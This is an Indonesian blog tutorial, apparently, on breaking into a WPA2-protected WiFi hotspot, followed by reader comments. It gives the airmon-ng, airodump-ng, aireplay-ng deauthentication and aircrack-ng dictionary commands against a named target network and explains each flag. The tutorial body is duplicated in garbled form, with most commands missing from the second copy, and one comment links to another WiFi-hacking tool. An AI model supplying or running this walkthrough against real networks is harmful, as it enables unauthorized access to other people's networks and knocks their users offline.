Hacking hotspot password wpa2-psk
Setelah anda puas berhasil menghack WEP dengan Backtrack kini anda akan
saya bawa untuk mengetahui cara hacking WLAN / Hotspot yang berenkripsi WPA.
ok langsung ya
buka terminal pada kali linux
lalu hidupkan mode monitornya disini interface saya wlan0
airmon-ng
start wlan0
setelah aktif mode
monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya
ketikkan perintah
airodump-ng
mon0
terus cari wifi yang terkunci dengan enkripsi wpa2
disini saya akan menyerang wifi trojanzboy@wifi
ketikkan perintah
airodump-ng
-w wpa2 -c 1 --bssid 94:0C:6D:EE:C2:3F mon0
ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)
-c 1 = channel yang
digunakan broadcast hotspot
--bssid 94:0C:6D:EE:C2:3F =
mac address hotspot
mon0= mode monitor interface
Jika dibarisan bawah terdapat station client yang terhubung dengan AP
selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client
yang terhubung caranya, buka terminal baru ketikan :
aireplay-ng --deauth
10 -a 94:0C:6D:EE:C2:3F -c 94:20:53:D5:09:65 mon0
Ket= --deauth 10 = mode penyerangan sampai 10x
-a = mac adress hotspot
-c = client yang terhubung
hotspot yaitu
ketika mengirim perintah deauth maka si client akan
terputus dari hotspot tunggu sampai client konek lagi.Dan kamu akan
mendapatkan WPA handshake
ket : hacking wpa2 tidak memerlukan banyak paket seperti hack wep.Kita hanya
mencari handshake nya saja
Jika belum dapat handshake lakukan deauthentifikasi client lagi biar tidak usah
mengetik ulang perintahnya anda cukup menekan tombol panah atas pada keyboard
untuk mengulang perintah terakhir.
Namun sayangnya data yang kita terima (dari Capturan) masih terenkripsi, saat
tutorial ini dibuat software aircrack-ng belum dapat membuka enkripsi tersebut
akan tetapi hanya bisa menyamakan dan mencocokan binary-nya dengan bantuan
kamus.
Tunggu sampai mendapatkan WPA handshake biarkan client mengkoneksikan lagi
wifinya ke hotspot yang diserang apabia client sudah konek lagi maka kamu akan
mendapatkan wpa handshake
Setelah dapat handshake saatnya kita mencocokan binary yang tercapture dengan
bantuan kamus, buka Terminal ketikkan
aircrack-ng
-w '/root/Desktop/TrojanzBoyword.txt' wpa2-01.cap
keterangan :
-w '/root/Desktop/TrojanzBoyword.txt' =
Letak wordlist/dictionary saya namakan TrojanzBoy.txt
wpa2-01.cap = hasil capture pada airodump-ng tadi
tunggu sampai wordlist/kamus
mencocokkan hasil capturing tadi apabia berhasil maka kunci/key akan
terpecahkan
Untuk memecahkan password wpa2 harus menggunakan wordlist atau kamus yang
benar-benar akurat dan dibutuhkan kesabaran
Setelah anda puas berhasil menghack WEP dengan Backtrack kini anda akan saya bawa untuk mengetahui cara hacking WLAN / Hotspot yang berenkripsi WPA.
ok langsung ya
buka terminal pada kali linux
lalu hidupkan mode monitornya disini interface saya wlan0
ketikkan perintah
terus cari wifi yang terkunci dengan enkripsi wpa2
disini saya akan menyerang wifi trojanzboy@wifi
ketikkan perintah
ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)
-c 1 = channel yang digunakan broadcast hotspot
--bssid 94:0C:6D:EE:C2:3F = mac address hotspot
mon0= mode monitor interface
Jika dibarisan bawah terdapat station client yang terhubung dengan AP
selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client yang terhubung caranya, buka terminal baru ketikan :
Ket= --deauth 10 = mode penyerangan sampai 10x
-a = mac adress hotspot
-c = client yang terhubung hotspot yaitu
ketika mengirim perintah deauth maka si client akan terputus dari hotspot tunggu sampai client konek lagi.Dan kamu akan mendapatkan WPA handshake
ket : hacking wpa2 tidak memerlukan banyak paket seperti hack wep.Kita hanya mencari handshake nya saja
Jika belum dapat handshake lakukan deauthentifikasi client lagi biar tidak usah mengetik ulang perintahnya anda cukup menekan tombol panah atas pada keyboard untuk mengulang perintah terakhir.
Namun sayangnya data yang kita terima (dari Capturan) masih terenkripsi, saat tutorial ini dibuat software aircrack-ng belum dapat membuka enkripsi tersebut akan tetapi hanya bisa menyamakan dan mencocokan binary-nya dengan bantuan kamus.
Tunggu sampai mendapatkan WPA handshake biarkan client mengkoneksikan lagi wifinya ke hotspot yang diserang apabia client sudah konek lagi maka kamu akan mendapatkan wpa handshake
Setelah dapat handshake saatnya kita mencocokan binary yang tercapture dengan bantuan kamus, buka Terminal ketikkan
wpa2-01.cap = hasil capture pada airodump-ng tadi
tunggu sampai wordlist/kamus mencocokkan hasil capturing tadi apabia berhasil maka kunci/key akan terpecahkan
Untuk memecahkan password wpa2 harus menggunakan wordlist atau kamus yang benar-benar akurat dan dibutuhkan kesabaran














isi file wordlist / TrojanzBoy.txt itu apa gan?
BalasHapusItu isi password sendiri gan yang di buat dengan wordlist
HapusJadi inti nya ini hanya crack wpa2 bukan menghack password wifi nya
Saya saran kan gan jangan ikuti tutorial nya sampe lebaran monyet juga ente ga bakal nemu password nya :v
keren
BalasHapushahaha hackel abal abal...
BalasHapusklo ini mah sama ja gak heckel gan... belum dipastikan 100% tembus. di karena kan harus ada kecocokan antara pass wifi target dengan isi pass d'dalam wordlist.cara tersebut hanya ampuh untuk wifi yg passnya rentan utk di hack.:)
BalasHapusbetul ane sudah nunggu 5 jam pke worldlist rockyou.txt gak dapet :v wkwkwkwk cape nunggunya pke reaver msih blum ad respon
HapusCara masukin wordlistnya gimana gan
BalasHapuskalo dah dapet wpa.0-1.cap nya bisa di crack dengan jonny the ripper boss kalo pake worlist kira 2jam baru dapat kalo ada yg pass kalo gak pake wordlist kira30 jam baru tembus gan
BalasHapuswahh artikel dan tutoral nya bagus2 gan...
BalasHapusijin share tutorial hack wifi gan dengan fluxion di kali linux 100% work
https://goo.gl/nn7uQ8
Airmon-ng start wlan0 kaga kaya digambar bro
BalasHapus